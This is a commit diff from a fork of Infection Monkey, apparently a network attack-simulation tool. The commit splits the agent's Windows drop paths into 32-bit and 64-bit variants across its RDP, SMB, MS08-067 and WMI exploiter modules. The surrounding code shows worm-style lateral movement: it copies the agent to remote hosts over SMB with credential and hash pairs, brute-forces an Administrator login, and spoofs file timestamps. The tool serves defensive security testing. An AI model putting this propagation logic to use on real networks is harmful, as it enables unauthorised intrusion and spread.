forked from p15670423/monkey
Monkey now uses different names for 32,64bit on windows.
No need to use dropper or rename moneky
This commit is contained in:
Itay Mizeretz
parent
72fd930499
commit
ee23703bfa
|
|
@ -9,6 +9,7 @@ from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter
|
|||
SambaCryExploiter, ElasticGroovyExploiter
|
||||
from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger
|
||||
from network.range import FixedRange
|
||||
from windows_upgrader import WindowsUpgrader
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
||||
|
|
@ -115,14 +116,12 @@ class Configuration(object):
|
|||
dropper_set_date = True
|
||||
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
|
||||
dropper_date_reference_path_linux = '/bin/sh'
|
||||
dropper_target_path = r"C:\Windows\monkey.exe"
|
||||
dropper_target_path_win_32 = r"C:\Windows\monkey32.exe"
|
||||
dropper_target_path_win_64 = r"C:\Windows\monkey64.exe"
|
||||
dropper_target_path_linux = '/tmp/monkey'
|
||||
|
||||
###########################
|
||||
# Windows upgrader config
|
||||
###########################
|
||||
|
||||
windows_upgrader_temp_path = r"C:\Windows\monkey64.exe"
|
||||
def get_dropper_target_path_win(self):
|
||||
return self.dropper_target_path_win_64 if WindowsUpgrader.is_64bit_python() else self.dropper_target_path_win_32
|
||||
|
||||
###########################
|
||||
# Kill file
|
||||
|
|
|
|||
|
|
@ -22,8 +22,8 @@
|
|||
"dropper_log_path_windows": "%temp%\\~df1562.tmp",
|
||||
"dropper_log_path_linux": "/tmp/user-1562",
|
||||
"dropper_set_date": true,
|
||||
"dropper_target_path": "C:\\Windows\\monkey.exe",
|
||||
"windows_upgrader_temp_path": "C:\\Windows\\monkey64.exe",
|
||||
"dropper_target_path_win_32": "C:\\Windows\\monkey32.exe",
|
||||
"dropper_target_path_win_64": "C:\\Windows\\monkey64.exe",
|
||||
"dropper_target_path_linux": "/tmp/monkey",
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -278,11 +278,11 @@ class RdpExploiter(HostExploiter):
|
|||
|
||||
if self._config.rdp_use_vbs_download:
|
||||
command = RDP_CMDLINE_HTTP_VBS % {
|
||||
'monkey_path': self._config.dropper_target_path,
|
||||
'monkey_path': self._config.get_dropper_target_path_win(),
|
||||
'http_path': http_path, 'parameters': cmdline}
|
||||
else:
|
||||
command = RDP_CMDLINE_HTTP_BITS % {
|
||||
'monkey_path': self._config.dropper_target_path,
|
||||
'monkey_path': self._config.get_dropper_target_path_win(),
|
||||
'http_path': http_path, 'parameters': cmdline}
|
||||
|
||||
user_password_pairs = self._config.get_exploit_user_password_pairs()
|
||||
|
|
|
|||
|
|
@ -57,7 +57,7 @@ class SmbExploiter(HostExploiter):
|
|||
# copy the file remotely using SMB
|
||||
remote_full_path = SmbTools.copy_file(self.host,
|
||||
src_path,
|
||||
self._config.dropper_target_path,
|
||||
self._config.get_dropper_target_path_win(),
|
||||
user,
|
||||
password,
|
||||
lm_hash,
|
||||
|
|
@ -85,9 +85,9 @@ class SmbExploiter(HostExploiter):
|
|||
return False
|
||||
|
||||
# execute the remote dropper in case the path isn't final
|
||||
if remote_full_path.lower() != self._config.dropper_target_path.lower():
|
||||
if remote_full_path.lower() != self._config.get_dropper_target_path_win().lower():
|
||||
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
|
||||
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path)
|
||||
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win())
|
||||
else:
|
||||
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
|
||||
build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||
|
|
|
|||
|
|
@ -214,7 +214,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
# copy the file remotely using SMB
|
||||
remote_full_path = SmbTools.copy_file(self.host,
|
||||
src_path,
|
||||
self._config.dropper_target_path,
|
||||
self._config.get_dropper_target_path_win(),
|
||||
self._config.ms08_067_remote_user_add,
|
||||
self._config.ms08_067_remote_user_pass)
|
||||
|
||||
|
|
@ -223,7 +223,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
for password in self._config.exploit_password_list:
|
||||
remote_full_path = SmbTools.copy_file(self.host,
|
||||
src_path,
|
||||
self._config.dropper_target_path,
|
||||
self._config.get_dropper_target_path_win(),
|
||||
"Administrator",
|
||||
password)
|
||||
if remote_full_path:
|
||||
|
|
@ -233,9 +233,9 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
return False
|
||||
|
||||
# execute the remote dropper in case the path isn't final
|
||||
if remote_full_path.lower() != self._config.dropper_target_path.lower():
|
||||
if remote_full_path.lower() != self._config.get_dropper_target_path_win().lower():
|
||||
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
|
||||
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path)
|
||||
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win())
|
||||
else:
|
||||
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
|
||||
build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||
|
|
|
|||
|
|
@ -77,7 +77,7 @@ class WmiExploiter(HostExploiter):
|
|||
# copy the file remotely using SMB
|
||||
remote_full_path = SmbTools.copy_file(self.host,
|
||||
src_path,
|
||||
self._config.dropper_target_path,
|
||||
self._config.get_dropper_target_path_win(),
|
||||
user,
|
||||
password,
|
||||
lm_hash,
|
||||
|
|
@ -88,9 +88,9 @@ class WmiExploiter(HostExploiter):
|
|||
wmi_connection.close()
|
||||
return False
|
||||
# execute the remote dropper in case the path isn't final
|
||||
elif remote_full_path.lower() != self._config.dropper_target_path.lower():
|
||||
elif remote_full_path.lower() != self._config.get_dropper_target_path_win().lower():
|
||||
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
|
||||
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path)
|
||||
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win())
|
||||
else:
|
||||
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
|
||||
build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||
|
|
|
|||
|
|
@ -10,7 +10,7 @@ import monkeyfs
|
|||
from config import WormConfiguration
|
||||
from control import ControlClient
|
||||
from exploit.tools import build_monkey_commandline_explicitly
|
||||
from model import DROPPER_CMDLINE_WINDOWS
|
||||
from model import MONKEY_CMDLINE_WINDOWS
|
||||
|
||||
__author__ = 'itay.mizeretz'
|
||||
|
||||
|
|
@ -45,15 +45,15 @@ class WindowsUpgrader(object):
|
|||
monkey_64_path = ControlClient.download_monkey_exe_by_os(True, False)
|
||||
with monkeyfs.open(monkey_64_path, "rb") as downloaded_monkey_file:
|
||||
monkey_bin = downloaded_monkey_file.read()
|
||||
with open(WormConfiguration.windows_upgrader_temp_path, 'wb') as written_monkey_file:
|
||||
with open(WormConfiguration.dropper_target_path_win_64, 'wb') as written_monkey_file:
|
||||
written_monkey_file.write(monkey_bin)
|
||||
|
||||
depth = int(opts.depth) if opts.depth is not None else None
|
||||
monkey_options = build_monkey_commandline_explicitly(
|
||||
opts.parent, opts.tunnel, opts.server, depth, WormConfiguration.dropper_target_path)
|
||||
opts.parent, opts.tunnel, opts.server, depth)
|
||||
|
||||
monkey_cmdline = DROPPER_CMDLINE_WINDOWS % {
|
||||
'dropper_path': WormConfiguration.windows_upgrader_temp_path} + monkey_options
|
||||
monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {
|
||||
'monkey_path': WormConfiguration.dropper_target_path_win_64} + monkey_options
|
||||
|
||||
monkey_process = subprocess.Popen(monkey_cmdline, shell=True,
|
||||
stdin=None, stdout=None, stderr=None,
|
||||
|
|
|
|||
|
|
@ -350,14 +350,7 @@ SCHEMA = {
|
|||
"type": "integer",
|
||||
"default": 60,
|
||||
"description": "Time to keep tunnel open before going down after last exploit (in seconds)"
|
||||
},
|
||||
"windows_upgrader_temp_path": {
|
||||
"title": "Temporary upgrade path for 64bit monkey on Windows",
|
||||
"type": "string",
|
||||
"default": "C:\\Windows\\monkey64.exe",
|
||||
"description": "Determines where should the dropper place the 64 bit monkey while"
|
||||
" upgrading on a Windows machine"
|
||||
},
|
||||
}
|
||||
}
|
||||
},
|
||||
"classes": {
|
||||
|
|
@ -447,10 +440,16 @@ SCHEMA = {
|
|||
"default": "/tmp/monkey",
|
||||
"description": "Determines where should the dropper place the monkey on a Linux machine"
|
||||
},
|
||||
"dropper_target_path": {
|
||||
"title": "Dropper target path on Windows",
|
||||
"dropper_target_path_win_32": {
|
||||
"title": "Dropper target path on Windows (32bit)",
|
||||
"type": "string",
|
||||
"default": "C:\\Windows\\monkey.exe",
|
||||
"default": "C:\\Windows\\monkey32.exe",
|
||||
"description": "Determines where should the dropper place the monkey on a Windows machine"
|
||||
},
|
||||
"dropper_target_path_win_64": {
|
||||
"title": "Dropper target path on Windows (64bit)",
|
||||
"type": "string",
|
||||
"default": "C:\\Windows\\monkey64.exe",
|
||||
"description": "Determines where should the dropper place the monkey on a Windows machine"
|
||||
},
|
||||
"dropper_try_move_first": {
|
||||
|
|
|
|||
Loading…
Reference in New Issue